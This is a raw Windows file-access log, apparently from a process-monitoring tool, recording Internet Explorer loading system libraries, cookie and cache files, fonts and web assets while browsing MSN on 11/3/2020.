11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieui.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wshqos.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wshqos.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\sxs.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\sxs.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\stdole2.tlb
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\credssp.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\credssp.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\schannel.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\schannel.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ncrypt.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ncrypt.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\gpapi.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\gpapi.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\p2pcollab.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\p2pcollab.dllp2pcollab.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cryptnet.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\cryptnet.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\Wldap32.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\Wldap32.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E046BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E046BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\50D6B15D9F2DCE1EDBB0C098625FBE47_281AC807DE0FEF15F2CA9911FE760A9B
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\50D6B15D9F2DCE1EDBB0C098625FBE47_281AC807DE0FEF15F2CA9911FE760A9B50D6B15D9F2DCE1EDBB0C098625FBE47_281AC807DE0FEF15F2CA9911FE760A9B
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\50D6B15D9F2DCE1EDBB0C098625FBE47_281AC807DE0FEF15F2CA9911FE760A9B
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\50D6B15D9F2DCE1EDBB0C098625FBE47_281AC807DE0FEF15F2CA9911FE760A9B50D6B15D9F2DCE1EDBB0C098625FBE47_281AC807DE0FEF15F2CA9911FE760A9B
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\SensApi.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\SensApi.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\BCFED8GC.TXT
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\I6P0K07S.TXT
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~cs-CZ~7.1.7601.16492.cat
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~cs-CZ~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~cs-CZ~7.1.7601.16492.cat
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\PT-BR[1].HTM
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\netprofm.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\netprofm.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\nlaapi.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\nlaapi.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msimtf.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\msimtf.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\oleacc.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\oleacc.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\oleaccrc.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\oleaccrc.dll
11/3/2020 - 11:45:46.75Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\npmproxy.dll
11/3/2020 - 11:45:46.75Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\npmproxy.dll
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\jscript9.dll
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\jscript9.dll
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\e151e5[1].gif
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\e151e5[1].gife151e5[1].gif
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\BB1kvzy[1].png
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\BB1kvzy[1].pngBB1kvzy[1].png
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\AAwBbg7[1].jpg
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\AAwBbg7[1].jpgAAwBbg7[1].jpg
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\AAv4RrG[1].jpg
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\AAv4RrG[1].jpgAAv4RrG[1].jpg
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\AAwGL0I[1].jpg
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\AAwGL0I[1].jpgAAwGL0I[1].jpg
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\BB8MKSg[1].png
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\BB8MKSg[1].pngBB8MKSg[1].png
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\BB8MIiC[1].png
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\BB8MIiC[1].pngBB8MIiC[1].png
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WindowsCodecs.dll
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\WindowsCodecs.dllWindowsCodecs.dll
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\b8-2f3a4c-4b5f58d3[1].css
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\b8-2f3a4c-4b5f58d3[1].cssb8-2f3a4c-4b5f58d3[1].css
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d11.dll
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d11.dll
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d10warp.dll
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\d3d10warp.dlld3d10warp.dll
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\~FontCache-System.dat
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\~FontCache-System.dat~FontCache-System.dat
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\xmllite.dll
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\xmllite.dll
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore\O7SUU5RP\www.msn[1].xml
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DOMStore\O7SUU5RP\www.msn[1].xmlwww.msn[1].xml
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\adswrappermsni[1].js
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\adswrappermsni[1].jsadswrappermsni[1].js
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\jquery-2.1.1.min[1].js
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\jquery-2.1.1.min[1].jsjquery-2.1.1.min[1].js
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\41-e73167-68ddb2ab[1].js
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\41-e73167-68ddb2ab[1].js41-e73167-68ddb2ab[1].js
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\~FontCache-FontFace.dat
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\~FontCache-FontFace.dat~FontCache-FontFace.dat
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\~FontCache-S-1-5-21-2148495166-3420019059-1286093062-1001.dat
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\~FontCache-S-1-5-21-2148495166-3420019059-1286093062-1001.dat~FontCache-S-1-5-21-2148495166-3420019059-1286093062-1001.dat
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\segoeui.ttf
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\segoeui.ttf
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\c64c2a[1].woff
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\c64c2a[1].woffc64c2a[1].woff
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\pt-BR\jscript9.dll.mui
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\pt-BR\jscript9.dll.muijscript9.dll.mui
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\S4OWK0RR.txt
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\S4OWK0RR.txt
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\OLU3XFVE.txt
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\OLU3XFVE.txt
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\powrprof.dll
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\powrprof.dll
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\times.ttf
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\times.ttf
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B45457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B45457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C775080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C775080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\024823B39FBEACCDB5C06426A8168E99_D14B1CE36D9D0F93A634A5E9E22B442B
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\024823B39FBEACCDB5C06426A8168E99_D14B1CE36D9D0F93A634A5E9E22B442B024823B39FBEACCDB5C06426A8168E99_D14B1CE36D9D0F93A634A5E9E22B442B
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\024823B39FBEACCDB5C06426A8168E99_D14B1CE36D9D0F93A634A5E9E22B442B
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\024823B39FBEACCDB5C06426A8168E99_D14B1CE36D9D0F93A634A5E9E22B442B024823B39FBEACCDB5C06426A8168E99_D14B1CE36D9D0F93A634A5E9E22B442B
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\tzres.dll
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\tzres.dll
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\990861[1].svg
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\990861[1].svg990861[1].svg
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\M4DVBFFQ.txt
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\M4DVBFFQ.txt
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\AA2JbD3[1].png
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ54RMQH\AA2JbD3[1].pngAA2JbD3[1].png
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\S5MKAZSW.txt
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\S5MKAZSW.txt
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\0SX9NXYL.txt
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\0SX9NXYL.txt
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\desktop.ini
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\desktop.ini
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\desktop.ini
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\History\desktop.ini
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\Z075FCUF.TXT
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\ast[1].js
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\ast[1].jsast[1].js
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Shell-WinIP-Package~31bf3856ad364e35~amd64~uk-UA~7.1.7601.16492.cat
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Shell-WinIP-Package~31bf3856ad364e35~amd64~uk-UA~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Shell-WinIP-Package~31bf3856ad364e35~amd64~uk-UA~7.1.7601.16492.cat
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\24-3b1d5e-68ddb2ab[1].js
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\24-3b1d5e-68ddb2ab[1].js24-3b1d5e-68ddb2ab[1].js
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\chartbeat[1].js
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RCRTXD2\chartbeat[1].jschartbeat[1].js
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winmm.dll
11/3/2020 - 11:45:46.153Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\winmm.dll
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\209I53WF.TXT
11/3/2020 - 11:45:46.153Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\KKO6BXU4.TXT
